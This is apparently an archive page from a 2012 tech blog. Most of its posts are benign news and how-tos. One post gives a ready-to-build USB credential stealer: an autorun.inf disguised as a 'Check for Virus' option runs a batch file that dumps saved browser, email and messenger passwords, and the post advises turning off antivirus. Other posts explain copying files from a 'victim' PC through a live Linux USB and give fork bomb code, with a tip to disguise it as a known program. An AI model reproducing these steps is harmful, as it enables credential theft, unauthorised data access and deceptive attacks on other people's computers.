alexa

Player created by Inbound Now - Social Media Tools.

Thursday, April 26, 2012

How to turn your pendrive into a password stealer


password stealer virus
Hi friends, now-a-days data transfer through USB drive has become very common be it your collage, office or a friend's place. 
But also be very careful as someone can steal all your data from your computer only by plugging in a USB drive into your computer.

In today's tutorial i'm gonna teach you how to sniff passwords from a computer only by plugging in your pen-drive into a computer and the password's get saved into your USB.

Few tools you need to download for sniffing passwords:


1. IE PassView
- Reveals passwords stored by Internet Explorer

2.Mail PassView
- Reveals passwords stored by any desktop email clients like Mozilla Thunderbird, Microsoft Outlook, Eudora, Netscape, Windows Live Mail etc.

3.PasswordFox
- Reveals passwords stored by the Mozilla Firefox browser.

4.ChromePass
-Reveals passwords stored by Google Chrome Web-browser.

5.Opera PassView
-Reveals passwords stored by Opera Web-browser.

6.MessenPass
-Reveals passwords stored by the following instant messenger applications:
  • MSN Messenger
  • Windows Messenger (In Windows XP)
  • Windows Live Messenger (In Windows XP/Vista/7)
  • Yahoo Messenger (Versions 5.x and 6.x)
  • Google Talk
  • ICQ Lite 4.x/5.x/2003
  • AOL Instant Messenger v4.6 or below, AIM 6.x, and AIM Pro.
  • Trillian
  • Trillian Astra
  • Miranda
  • GAIM/Pidgin
  • MySpace IM
  • PaltalkScene
  • Digsby
Download MessenPass

Note: A friend just told me that he can't find the .exe file after extracting the Zip. If you are facing the same problem, I suggest you to deactivate your Antivirus for a while and later activate it again when your USB is ready. This is because many antivirus softwares confuse these password extractor applications as viruses.

How to use these tools to sniff passwords:

1.   First of all you need to download all the above mentioned six applications. Next, as all of them are zipped, you have to unzip(extract) them all and put(only) the .exe files in the root directory of the USB.Next, open Notepad and paste the following code in it and save it in the USB as autorun.inf

[autorun]
open=explode.bat
ACTION= Check for Virus

2.   Now open Notepad again and type the code below and save it as explode.bat

start iepv.exe /stext iepv.txt
start passwordfox.exe /stext passwordfox.txt
start chromepass.exe /stext chromepass.txt
start mailpv.exe /stext mailpv.txt
start operapassview.exe /stext operapassview.txt
start mspass.exe /stext mspass.txt

3.   Bingo, your password stealer USB is finally ready for action.



How to Use it:


When you insert the USB drive into a computer, an autorun screen will appear with the option Check for Virus. Click on it and automatically all the passwords will be saved to your USB in .txt files.

How to Protect your PC from this kind of threat:

It is advisable to disable the USB ports of your computer when it is exposed to other users by going to the BIOS setup but this also has its own set of limitations as disabling the USB ports would also disable USB keyboards, USB printers etc.

Hence I've come up with a registry hack which doesn't disable your USB ports but instead disables write access to USB ports so that data cannot be written into pendrives.

Step 1:

Open the Windows Registry by going to 'run' and typing "regedit.exe" and then follow the following path:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\ Control\StorageDevicePolicies

Now on the right hand panel, right click and add a DWORD Value called WriteProtect and assign its value to 1(assign the value to 0 again to disable write protection on your drives) and you successfully protected your PC from this hack. :)

Take 5 minutes to share this article if you liked it. DO let me know in the comment section below if you have and questions.
0 comments
Read More

Wednesday, April 25, 2012

Tips to Secure a Home Computer

Mobile Computing

Hello friends, today I'll try to brief the steps required to secure a home computer. Well this article actually goes for windows users but may comply with other OS users as well.

  • Run windows Update at-least once a week to patch your system against the latest vulnerabilities and exploits.
  • Install some really good antivirus software and update it weekly to keep the virus definitions up-to-date. This will help you to wave-off risks from the latest Trojans, worms and viruses.
  • Install an anti spyware application which will detect and remove all spywares and backdoor applications like Trojan. Note: Having a good antivirus will not necessarily protect your home computer from spywares always.
  • Install a good Firewall on your system(like Zone Alarm or the built in firewall of your antivirus application).



Do you have any other tips in mind? Let us know in the comment box below and we will definitely add that to our list.

0 comments
Read More

Tuesday, April 17, 2012

How to steal data from windows with Live USB [VIDEO]


I’m sure everyone has came across a situation when they wished if they could copy or steal files from a PC(the one of your friend/ colleague etc.) but was resisted by a password protected user account. Right?

Today in this tutorial I’ll teach you just that i.e., how to copy or steal files from a password protected computer.

Step 1
Transcend USB flash driveFirstly you will need to create a bootable Linux USB disk. (Few days back I posted a tutorial on How to create a bootable USB disk. Click here to read it.)

Step 2
Plug-in the bootable USB drive into the USB slot of the victim computer and reboot the PC. When the PC restarts, quickly go to the Boot Settings and choose the USB drive to boot from.
Soon you will be prompted by a screen asking you:

  • whether you want to install the distribution (I’m using Ubuntu for this tutorial)
  • or do you want to run the live disk

Select the live disk option from the menu. It should then take a few seconds to boot the OS from your pen drive.

Step 3
As the Ubuntu desktop appears, go to the top panel and click on 'places' and choose the hard-drive from the dropdown menu that appears.

Meanwhile in the desktop, you will soon notice the hard-disk logo appearing. Just click on it and browse the whole drive freely, without any password restriction.

To steal a file, just copy it to the Ubuntu desktop and shutdown the computer and then unplug the USB. And Voila, you’re done!!

This whole process may take approx 2-3 minutes if done correctly.



I’ve made a video tutorial on this which you can see below.

0 comments
Read More

How to make a Virus in 10 seconds to crash a computer

virus fork bomb techtreck.inHi pals !! Today i'm going to teach you all how to create the world's smallest virus which is also known as Fork Bomb.
The reason why this specific code is so famous are:
1. The fact that this code is only 5 characters long. 
2. Also, this virus is not detected by any antivirus app as it is just a .bat file.

So let's take a look at how to create it using Notepad

First of all open notepad.exe and paste the following code written below in bold red.
%0|%0
Now save the file in your desktop as bomb.bat(note the .bat extension is very important) and your fork bomb is ready. Now you only need to double click on the bomb.bat file to crash any computer.
Fork Bomb using C++


Just execute the following code in your c compiler:

#include <unistd.h>int main(void){  while(1)    fork();  return 0;}
Fork Bomb using Unix/Linux

You have to open shell prompt and run the following code to execute the attack:
: (){ : |:& };:
You can definitely get creative and change the icon of the .bat file and also rename it to something like "Chrome" or "Photoshop" etc. to make it look more real and prank your friends.
0 comments
Read More

Monday, April 16, 2012

5 Top Call Apps to get the Most Out of your Smart Phone

A smartphone is still a phone, so why not use apps to get the most out of phone calls? These apps will help you keep your call costs low and make complicated tasks like video and conference calling easy.

1. Talkatone: Free VoIP calls

Google Voice by itself isn't VoIP, but it can be with the Talkatone app. This software combines Google Voice with GMail's voice chat capability to make phone calls anywhere without using your minutes, and completely free if you're using your phone's WiFi. This may sound complicated, but Talkatone has simple to understand instructions that guide you through the signup process step by step.

However, the "free" aspect will only last through 2011, as Google has already announced that they'll start charging for the services this app depends on. A pay version of Talkatone is available that eliminates the iAds, although they're hardly intrusive during phonecalls. An Android version of the app will be available in the near future.


2. PowWowNow: Easy conference calling


PowWowNow handles all the back-end set-up for conference calling, letting users schedule calls with the built-in calendar and join conversations at the touch of a button. Calls are routed to a single number, so users only pay call rates for a regular phone call.


3. Skype: Video calling to anyone

With its leadership in voice and video-based calls via computer, it should be no surprise that Skype has made a stellar effort with their smartphone app. Unlike other video apps, Skype's use of existing infrastructure makes this truly cross-platform, allowing you to chat with anyone no matter what device they're using. The service also offers VoIP calls to phones, but unlike Talkatone there is a small fee.


4. Mr. Number: Reverse Phone Look-up

Want to know who called you? Mr. Number can find information on 90% of land line numbers, and about 50% of cell phone numbers. Looking up land line numbers is free, but there is a small fee for looking up cell phone numbers because the company has to pay for cell number directories. If it can't find the number, there's no charge.
Phone Numbers and information can be added to your contacts with the touch of a button.

5. Call Cost 2 and CalLog: Track your minutes

While the other four apps are available for several platforms, there isn't a good universal app for call timing. The leading apps for Android and iPhone take very different approaches to this task.

Call Cost 2 for Android automatically tracks your phone call time and can calculate the cost of each call. The cost settings are extensive, letting you input varying charges for hours and marking number that aren't charged under your phone plan. Notifications can also be set up for call length and charges to keep you from overspending.

CalLog for iPhone stores call time information for all of your phone calls. It integrates with Calendar and Maps, letting you see not only who you call, but where you called them from and when. This information can also be exported to plain text or CSV for spreadsheets, which is a major boon to professionals who charge for consulting calls.

Mike
About the Guest Author:
Hi its Mike. Catch me @thetechlegend
0 comments
Read More

Tuesday, April 10, 2012

Facebook's tying knot with Instagram- just a coincidence with Google?

Facebook Instagram ~techtreck.in
Recently it was announced that social networking giant Facebook Inc. will be acquiring the fast and beautiful photo sharing application InstagramIs this just a coincidence with Google's acquisition of Picnik?

Recently I covered an article about Google's acquisition of the so-popular Picnik for its Google+ developments(read now) and this week we have Facebook taking over Instagram in News.


I'm excited to share the news that we've agreed to acquire Instagram and that their talented team will be joining Facebook.  -Mark Zuckerberg.
This is supposed to be Facebook's strategy to keep pace with its competitor Google+ which already has reached 170M+ users in this short period of time.


While Picnik has announced that it will discontinue its services for the public this April, Instagram is tight lipped about whether all their old services will be available after the acquisition or not.
0 comments
Read More

How to Permanently delete your Facebook Account

delete facebook ~techtreck.in
Many Facebook users are unaware of the fact that they can actually delete their Facebook account permanently.

When you normally delete your Facebook account, it doesn't get deleted but actually gets deactivated

Procedure
If you are sure that you want to delete your Facebook profile parmanently,


Alternate
You can also email at privacy@facebook.com from your registered email id and ask them to delete your account(but this evidently takes more time).



Related Article:
0 comments
Read More

Monday, April 9, 2012

How to access blocked Facebook from your Company,School & College Campus

How to access blocked website ~techtreck.inNow a days most of the offices or collages have WiFi connectivity in their campuses, but the main drawback it that many websites like Facebook are blocked by the Administrator.

The following hacks lets you access Facebook or other websites from any blocked network:

1. Use a Web based Proxy

There are a number of Web based proxies available which lets you access Facebook from their site itself.
Some of the best proxy websites are:
But if these websites are blocked themselves try the next trick

2. Set up a proxy in your browser

From your browser go to settings > Proxy settings > Edit and click Choose a Proxy server for your LAN.

How to access blocked website ~techtreck.inFinding proxies for Facebook is a bit complex stuff as proxies keep on getting overloaded very fast so i decided to provide the following link where you can get lists of Proxy ports and IP's updated every minute.

3. Use Facebook via Email

You can actually Send messages to your friends, comment on photos, all by email and if email notification is enabled in your account.

4. Access Facebook using its IP Address

How to access blocked website ~techtreck.in
You can access Facebook using its IP Address too(works if only the domain name is blocked by the Administrator). First go to cmd and ping facebook.com to obtain its IP address and then enter it in your browser instead of typing www.Facebook.com
0 comments
Read More

Facebook launches Messenger for Windows

facebook messenger for windows download ~www.techtreck.in


Facebook has recently launched a brand new Messenger for Windows.
This new offline Facebook Messenger now lets you stay connected with your friends even when you are surfing some other website or busy with some other App. 
Lets take a look at what this application has to offer.

Chat from your desktop

You can See and Reply right from your desktop

Get instant notification

Get updates on your Friend's Activities, Comments and Tags as soon as they happen.

facebook messenger for windows download ~www.techtreck.in
This is how the chat bar looks


how to download Facebook Messenger for Windows?  (Click here 
0 comments
Read More

Thursday, April 5, 2012

Add Face recognition Login to your PC

facial recognition logon software techtreck.in

Hey friends, i know it's kind of annoying to type your password to login to windows, specially for those who has to do it so many times in a day. Thankfully you can automate the login process using your webcam and installing a facial recognition software.


There are so many facial recognition softwares available in the internet and most of them work pretty well on all windows operating systems.

Advantages of Facial Recognition login

1. saves time by automating the login process

2. you get higher security as your face is the only thing that logs you in
(that means, holding your photograph near the camera wont work)

Facial Recognition softwares currently on the hype

facial recognition logon software techtreck.in1. Luxand Blink (free or paid)

download page: click here

Operating System- Windows XP, Windows Vista, Windows 7 

Blink by Luxand is so far the best one according to my personal experience.

2. Fast Access(paid/free trial)

download page: click here

Operating System- Windows XP, Windows Vista, Windows 7

Fast access is also pretty cool. You can also try their product for free for a trial period

3. KeyLemon(free or paid) 

download page: click here

Operating System- Windows XP, Windows Vista, Windows 7, Mac

KeyLemon gives some additional features like Hijacker tracking-which saves snapshots for you of the hijacker who tried to login to your laptop after it got stolen.
0 comments
Read More

Tuesday, April 3, 2012

India's first 4G service launching in Kolkata



Bharti Airtel, India's one of the premier mobile service providers told that they will launch India's first 4G services in the city of Kolkata this month.

4G which is the new member of the 3G and 2G family is supposed to be five times faster than the old 3G services.
Other companies to follow 4G launch in India will be Reliance Infotel followed by Qualcomm, Tikona, Aircel and Augere.
0 comments
Read More

Monday, April 2, 2012

How to Create a Bootable Linux USB disk

Ubuntu live disk/bootable usb disk @ techtreck.in

A livecd or a bootable USB disk contains a fully functional operating system preloaded in it, which can be run right from the disk without any need to install them on the hard disk.

Today in this tutorial,I will show you how to create a Ubuntu bootable USB disk in this step by step guide. 

Things you will need  to download:
 1. The latest version of Ubuntu (click here
 2. Official Linux USB installer (click here)

Procedure:
Step 1: 
Run the universal USB Installer setup and select the Ubuntu Desktop Edition from the drop-down list.
Ubuntu live disk/bootable usb disk @ techtreck.in

Step 2:
Next click on browse and select the Ubuntu .iso file which you downloaded previously.
Ubuntu live disk/bootable usb disk @ techtreck.in
 Step 3:
Select the drive in which the USB stick is located and click Create.
Ubuntu live disk/bootable usb disk @ techtreck.in
 Step 4:
Wait for the setup to transform your USB stick to a bootable one.
Ubuntu live disk/bootable usb disk @ techtreck.in
Ubuntu live disk/bootable usb disk @ techtreck.in
Step 5: When your USB disk has been created, restart your computer with the USB disk plugged-in.
Before your computer boots, go to the boot menu and select the USB drive to boot from... and you're done.
0 comments
Read More
Powered by Blogger.